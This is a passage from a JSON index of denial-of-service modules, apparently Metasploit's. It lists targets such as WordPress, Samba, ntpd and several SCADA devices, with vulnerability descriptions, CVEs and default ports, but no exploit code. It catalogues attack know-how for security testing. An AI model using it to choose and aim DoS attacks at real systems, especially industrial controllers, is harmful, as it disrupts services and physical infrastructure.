"path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/rails_json_float_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/slowloris": {
"name": "Slowloris Denial of Service Attack",
"full_name": "auxiliary/dos/http/slowloris",
"rank": 300,
"disclosure_date": "2009-06-17",
"type": "auxiliary",
"author": [
"RSnake",
"Gokberk Yaltirakli",
"Daniel Teixeira",
"Matthew Kienow <matthew_kienow[AT]rapid7.com>"
],
"description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.",
"references": [
"CVE-2007-6750",
"CVE-2010-2227",
"EDB-8976",
"URL-https://github.com/gkbrk/slowloris"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-28 13:49:31 +0000",
"path": "/modules/auxiliary/dos/http/slowloris.py",
"is_install_path": true,
"ref_name": "dos/http/slowloris",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/sonicwall_ssl_format": {
"name": "SonicWALL SSL-VPN Format String Vulnerability",
"full_name": "auxiliary/dos/http/sonicwall_ssl_format",
"rank": 300,
"disclosure_date": "2009-05-29",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.",
"references": [
"BID-35145",
"OSVDB-54881",
"URL-http://www.aushack.com/200905-sonicwall.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb",
"is_install_path": true,
"ref_name": "dos/http/sonicwall_ssl_format",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ua_parser_js_redos": {
"name": "ua-parser-js npm module ReDoS",
"full_name": "auxiliary/dos/http/ua_parser_js_redos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ryan Knell, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
"description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"ua-parser-js\". Server-side applications that use\n \"ua-parser-js\" for parsing the browser user-agent string will be vulnerable\n if they call the \"getOS\" or \"getResult\" functions. This vulnerability was\n fixed as of version 0.7.16.",
"references": [
"CVE-2017-16086",
"URL-https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79",
"CWE-400"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb",
"is_install_path": true,
"ref_name": "dos/http/ua_parser_js_redos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/webkitplus": {
"name": "WebKitGTK+ WebKitFaviconDatabase DoS",
"full_name": "auxiliary/dos/http/webkitplus",
"rank": 300,
"disclosure_date": "2018-06-03",
"type": "auxiliary",
"author": [
"Dhiraj Mishra",
"Hardik Mehta",
"Zubin Devnani",
"Manuel Caballero"
],
"description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.",
"references": [
"EDB-44842",
"CVE-2018-11646",
"URL-https://bugs.webkit.org/show_bug.cgi?id=186164",
"URL-https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-06-14 11:25:00 +0000",
"path": "/modules/auxiliary/dos/http/webkitplus.rb",
"is_install_path": true,
"ref_name": "dos/http/webkitplus",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/webrick_regex": {
"name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS",
"full_name": "auxiliary/dos/http/webrick_regex",
"rank": 300,
"disclosure_date": "2008-08-08",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.",
"references": [
"BID-30644",
"CVE-2008-3656",
"OSVDB-47471",
"URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/webrick_regex.rb",
"is_install_path": true,
"ref_name": "dos/http/webrick_regex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/wordpress_directory_traversal_dos": {
"name": "WordPress Traversal Directory DoS",
"full_name": "auxiliary/dos/http/wordpress_directory_traversal_dos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Yorick Koster",
"CryptisStudents"
],
"description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.",
"references": [
"CVE-2016-6897",
"EDB-40288",
"OVEID-OVE-20160712-0036"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_directory_traversal_dos",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/wordpress_long_password_dos": {
"name": "WordPress Long Password DoS",
"full_name": "auxiliary/dos/http/wordpress_long_password_dos",
"rank": 300,
"disclosure_date": "2014-11-20",
"type": "auxiliary",
"author": [
"Javier Nieto Arevalo",
"Andres Rojas Guerrero",
"rastating"
],
"description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.",
"references": [
"CVE-2014-9016",
"URL-http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034",
"OSVDB-114857",
"WPVDB-7681"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_long_password_dos",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/wordpress_xmlrpc_dos": {
"name": "Wordpress XMLRPC DoS",
"full_name": "auxiliary/dos/http/wordpress_xmlrpc_dos",
"rank": 300,
"disclosure_date": "2014-08-06",
"type": "auxiliary",
"author": [
"Nir Goldshlager",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).",
"references": [
"CVE-2014-5266",
"URL-http://wordpress.org/news/2014/08/wordpress-3-9-2/",
"URL-http://www.breaksec.com/?p=6362",
"URL-http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/",
"URL-https://core.trac.wordpress.org/changeset/29404",
"WPVDB-7526"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_xmlrpc_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ws_dos": {
"name": "ws - Denial of Service",
"full_name": "auxiliary/dos/http/ws_dos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ryan Knell, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
"description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.",
"references": [
"URL-https://nodesecurity.io/advisories/550",
"CWE-400"
],
"platform": "",
"arch": "",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-11 11:49:31 +0000",
"path": "/modules/auxiliary/dos/http/ws_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/ws_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/mdns/avahi_portzero": {
"name": "Avahi Source Port 0 DoS",
"full_name": "auxiliary/dos/mdns/avahi_portzero",
"rank": 300,
"disclosure_date": "2008-11-14",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Avahi-daemon versions prior to 0.6.24 can be DoS'd\n with an mDNS packet with a source port of 0.",
"references": [
"CVE-2008-5081",
"OSVDB-50929"
],
"platform": "",
"arch": "",
"rport": 5353,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb",
"is_install_path": true,
"ref_name": "dos/mdns/avahi_portzero",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/dopewars": {
"name": "Dopewars Denial of Service",
"full_name": "auxiliary/dos/misc/dopewars",
"rank": 300,
"disclosure_date": "2009-10-05",
"type": "auxiliary",
"author": [
"Doug Prostko <dougtko@gmail.com>"
],
"description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.",
"references": [
"CVE-2009-3591",
"OSVDB-58884",
"BID-36606"
],
"platform": "",
"arch": "",
"rport": 7902,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/misc/dopewars.rb",
"is_install_path": true,
"ref_name": "dos/misc/dopewars",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/ibm_sametime_webplayer_dos": {
"name": "IBM Lotus Sametime WebPlayer DoS",
"full_name": "auxiliary/dos/misc/ibm_sametime_webplayer_dos",
"rank": 300,
"disclosure_date": "2013-11-07",
"type": "auxiliary",
"author": [
"Chris John Riley",
"kicks4kittens"
],
"description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.",
"references": [
"CVE-2013-3986",
"OSVDB-99552",
"BID-63611",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21654041",
"URL-http://xforce.iss.net/xforce/xfdb/84969"
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_sametime_webplayer_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/ibm_tsm_dos": {
"name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
"full_name": "auxiliary/dos/misc/ibm_tsm_dos",
"rank": 300,
"disclosure_date": "2015-12-15",
"type": "auxiliary",
"author": [
"Gianni Gnesa",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits a denial of service condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.",
"references": [
"EDB-38979",
"OSVDB-132307"
],
"platform": "",
"arch": "",
"rport": 11460,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_tsm_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/misc/memcached": {
"name": "Memcached Remote Denial of Service",
"full_name": "auxiliary/dos/misc/memcached",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.",
"references": [
"URL-https://code.google.com/p/memcached/issues/detail?id=192",
"CVE-2011-4971",
"OSVDB-92867"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/misc/memcached.rb",
"is_install_path": true,
"ref_name": "dos/misc/memcached",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ntp/ntpd_reserved_dos": {
"name": "NTP.org ntpd Reserved Mode Denial of Service",
"full_name": "auxiliary/dos/ntp/ntpd_reserved_dos",
"rank": 300,
"disclosure_date": "2009-10-04",
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!",
"references": [
"BID-37255",
"CVE-2009-3563",
"OSVDB-60847",
"URL-https://support.ntp.org/bugs/show_bug.cgi?id=1331"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
"is_install_path": true,
"ref_name": "dos/ntp/ntpd_reserved_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/pptp/ms02_063_pptp_dos": {
"name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service",
"full_name": "auxiliary/dos/pptp/ms02_063_pptp_dos",
"rank": 300,
"disclosure_date": "2002-09-26",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.",
"references": [
"BID-5807",
"CVE-2002-1214",
"OSVDB-13422",
"MSB-MS02-063"
],
"platform": "",
"arch": "",
"rport": 1723,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb",
"is_install_path": true,
"ref_name": "dos/pptp/ms02_063_pptp_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/rpc/rpcbomb": {
"name": "RPC DoS targeting *nix rpcbind/libtirpc",
"full_name": "auxiliary/dos/rpc/rpcbomb",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"guidovranken",
"Pearce Barry <pearce_barry@rapid7.com>"
],
"description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.",
"references": [
"CVE-2017-8779",
"BID-98325",
"URL-http://openwall.com/lists/oss-security/2017/05/03/12"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
"is_install_path": true,
"ref_name": "dos/rpc/rpcbomb",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/samba/lsa_addprivs_heap": {
"name": "Samba lsa_io_privilege_set Heap Overflow",
"full_name": "auxiliary/dos/samba/lsa_addprivs_heap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb",
"is_install_path": true,
"ref_name": "dos/samba/lsa_addprivs_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "auxiliary/dos/samba/lsa_transnames_heap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "dos/samba/lsa_transnames_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/samba/read_nttrans_ea_list": {
"name": "Samba read_nttrans_ea_list Integer Overflow",
"full_name": "auxiliary/dos/samba/read_nttrans_ea_list",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jeremy Allison",
"dz_lnly"
],
"description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.",
"references": [
"OSVDB-95969",
"BID-61597",
"EDB-27778",
"CVE-2013-4124"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb",
"is_install_path": true,
"ref_name": "dos/samba/read_nttrans_ea_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": {
"name": "SAP SOAP EPS_DELETE_FILE File Deletion",
"full_name": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Sintsov",
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP\n RFC Service, to delete arbitrary files on the remote file system. The module can\n also be used to capture SMB hashes by using a fake SMB share as DIRNAME.",
"references": [
"OSVDB-74780",
"URL-http://dsecrg.com/pages/vul/show.php?id=331",
"URL-https://service.sap.com/sap/support/notes/1554030"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
"is_install_path": true,
"ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/scada/allen_bradley_pccc": {
"name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)",
"full_name": "auxiliary/dos/scada/allen_bradley_pccc",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"José Diogo Monteiro <jdlopes@student.dei.uc.pt>",
"Luis Rosa <lmrosa@dei.uc.pt>",
"Miguel Borges de Freitas <miguelbf@dei.uc.pt>"
],
"description": "A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.",
"references": [
"CVE-2017-7924",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-138-03",
"URL-http://dl.acm.org/citation.cfm?doid=3174776.3174780"
],
"platform": "",
"arch": "",
"rport": 44818,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-22 13:33:24 +0000",
"path": "/modules/auxiliary/dos/scada/allen_bradley_pccc.rb",
"is_install_path": true,
"ref_name": "dos/scada/allen_bradley_pccc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/beckhoff_twincat": {
"name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS",
"full_name": "auxiliary/dos/scada/beckhoff_twincat",
"rank": 300,
"disclosure_date": "2011-09-13",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"jfa"
],
"description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).",
"references": [
"CVE-2011-3486",
"OSVDB-75495",
"URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt"
],
"platform": "",
"arch": "",
"rport": 48899,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb",
"is_install_path": true,
"ref_name": "dos/scada/beckhoff_twincat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/d20_tftp_overflow": {
"name": "General Electric D20ME TFTP Server Buffer Overflow DoS",
"full_name": "auxiliary/dos/scada/d20_tftp_overflow",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb",
"is_install_path": true,
"ref_name": "dos/scada/d20_tftp_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/igss9_dataserver": {
"name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS",
"full_name": "auxiliary/dos/scada/igss9_dataserver",
"rank": 300,
"disclosure_date": "2011-12-20",
"type": "auxiliary",
"author": [
"jfa"
],
"description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.",
"references": [
"CVE-2011-4050",
"OSVDB-77976",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-335-01.pdf"
],
"platform": "",
"arch": "",
"rport": 12401,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb",
"is_install_path": true,
"ref_name": "dos/scada/igss9_dataserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/siemens_siprotec4": {
"name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service",
"full_name": "auxiliary/dos/scada/siemens_siprotec4",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"M. Can Kurnaz"
],
"description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.",
"references": [
"EDB-44103",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-28 13:12:43 +0000",
"path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb",
"is_install_path": true,
"ref_name": "dos/scada/siemens_siprotec4",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/scada/yokogawa_logsvr": {
"name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow",
"full_name": "auxiliary/dos/scada/yokogawa_logsvr",
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
"CVE-2014-0781"
],
"platform": "",
"arch": "",
"rport": 52302,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
"is_install_path": true,
"ref_name": "dos/scada/yokogawa_logsvr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/smb/smb_loris": {
"name": "SMBLoris NBSS Denial of Service",
"full_name": "auxiliary/dos/smb/smb_loris",
"rank": 300,
"disclosure_date": "2017-06-29",
"type": "auxiliary",
"author": [
"thelightcosine",
"Adam Cammack <adam_cammack@rapid7.com>"
],
"description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.",
"references": [
"URL-http://smbloris.com/"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-23 14:55:18 +0000",
"path": "/modules/auxiliary/dos/smb/smb_loris.rb",
"is_install_path": true,
"ref_name": "dos/smb/smb_loris",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/smtp/sendmail_prescan": {
"name": "Sendmail SMTP Address prescan Memory Corruption",
"full_name": "auxiliary/dos/smtp/sendmail_prescan",
"rank": 300,
"disclosure_date": "2003-09-17",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.",
"references": [
"OSVDB-2577",
"CVE-2003-0694",
"BID-8641",
"EDB-24"
],
"platform": "",
"arch": "",
"rport": 25,
